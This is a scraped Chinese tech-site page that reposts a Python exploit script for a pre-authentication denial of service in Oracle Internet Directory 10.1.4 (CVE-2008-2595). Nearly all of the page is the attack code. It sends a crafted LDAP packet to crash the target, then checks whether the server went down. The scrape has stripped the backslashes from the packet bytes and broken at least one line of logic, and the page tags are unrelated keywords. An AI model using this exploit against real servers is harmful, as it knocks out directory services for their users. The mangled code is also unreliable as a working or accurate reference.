欢迎来到福编程网,本站提供各种互联网专业知识!
手机版
微信关注
快捷导航
正则表达式 AJAX相关 黑客相关 相关技巧 Mysql MsSql MsSql2005 MsSql2008 MariaDB Oracle Access SQLite PostgreSQL MongoDB DB2 Redis 数据库文摘 数据库其它 LINUX RedHat/Centos Ubuntu/Debian Fedora Solaris 红旗Linux Unix/BSD 苹果MAC 麒麟系统 注册表 BIOS 系统安装 系统进程 Fireworks教程
您的位置:网站首页 > 无法确定分类

Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit

发布时间:1970-01-01 作者:佚名 来源:互联网
标签: 雪佛兰 通用 奢华 劳斯莱斯 旗舰版 64位 收藏夹 解调器
#!/usr/bin/python"""OracleInternetDirectory10.1.4preauthenticationDenialOfServiceNOTES:Under32bitsplatformsitcrashesimmediately.Under64bitsitmaytakeevenhours.Sometimesyouneed2shootstocrashOID
#!/usr/bin/python """

Oracle Internet Directory 10.1.4 preauthentication Denial Of Service NOTES: Under 32 bits platforms it crashes immediately. Under 64 bits it may take even hours.

Sometimes you need 2 shoots to crash OID completely. The server "commonly" tolerates one

shoot, but even when you only send one packet it will crash. Tested: Win2000 x86, WinXP x86, Win2003 X86_64 Vulnerability found by Joxean Koret (joxeankoret [ at ] yahoo DOT es) Fixed: Oracle Critical Patch Update July 2008

CVEID: CVE-2008-2595

""" import sys

import time

import socket healthPacket = "0%x02x01x01c x04x00nx01x02nx01x00x02x01x00x02x01x00x01x01x00x87x0bobjectClass0x00"

packet = "x30x0ex02x01x01x60x09x30x01x03x04x02x44x4ex80x00" def checkHealth(hostname, port):

print " --> Wating 5 seconds"

time.sleep(5)

print " --> Connecting to target..."

socket.setdefaulttimeout(5)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect((hostname, port)) try:

print " --> Sending 'health' packet ..."

s.sendall(healthPacket)

print " --> Trying to receive something..."

data = s.recv(1024)

except:

err = sys.exc_info()[1] if int(err[0]) == 104:

print "[ ] Exploits works!"

return if data != "":

print "[!] Server is up and running :("

else:

print "[?] Server doesn't answer nothing. It works?" def oidDos(hostname, port):

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

print "[ ] Connecting to ldap://%s:%d..." % (hostname, port)

s.connect((hostname, int(port))) print "[ ] Sending packet..."

s.sendall(packet)

s.close() print "[ ] Checking OID's health..."

checkHealth(hostname, port)

except:

print sys.exc_info()[1] def usage():

print "Oracle Internet Directory 10.1.4 Remote Preauthentication DOS"

print "Copyright (c) 2007 Joxean Koret"

print

print "Usage:"

print sys.argv[0],"-h -p"

print def main():

if len(sys.argv) != 3:

usage()

sys.exit(0)

hostname = None

port = None i = 0

for param in sys.argv:

i = 1

if i == 1:

continue

if param.startswith("-h"):

hostname = param[2:]

elif param.startswith("-p"):

port = int(param[2:])

else:

print "Unknown option '%s'" % param

usage()

sys.exit(1)

if not hostname or not port:

print "Bad command line."

usage()

sys.exit(1) oidDos(hostname, port) if __name__ == "__main__":

main()

相关推荐

文章分类

免责声明 联系我们 关于我们 广告合作 电脑相关 手机学院 网络编程 数据库 操作系统 平面设计 网站运营 网络安全

热门关键词

雪佛兰 通用 奢华 劳斯莱斯 旗舰版 64位 收藏夹 解调器 网卡 网线 分辨率 家电 4k 显示器 header USER_AGENT 色彩 图形 商业 生成

热门文章

最新更新

网站首页  | 关于我们  | 免责声明  | 广告合作  | 联系我们
Copyright @ 2015-2024 福编程 fuphp All Rights Reserved.
豫ICP备15036959号-4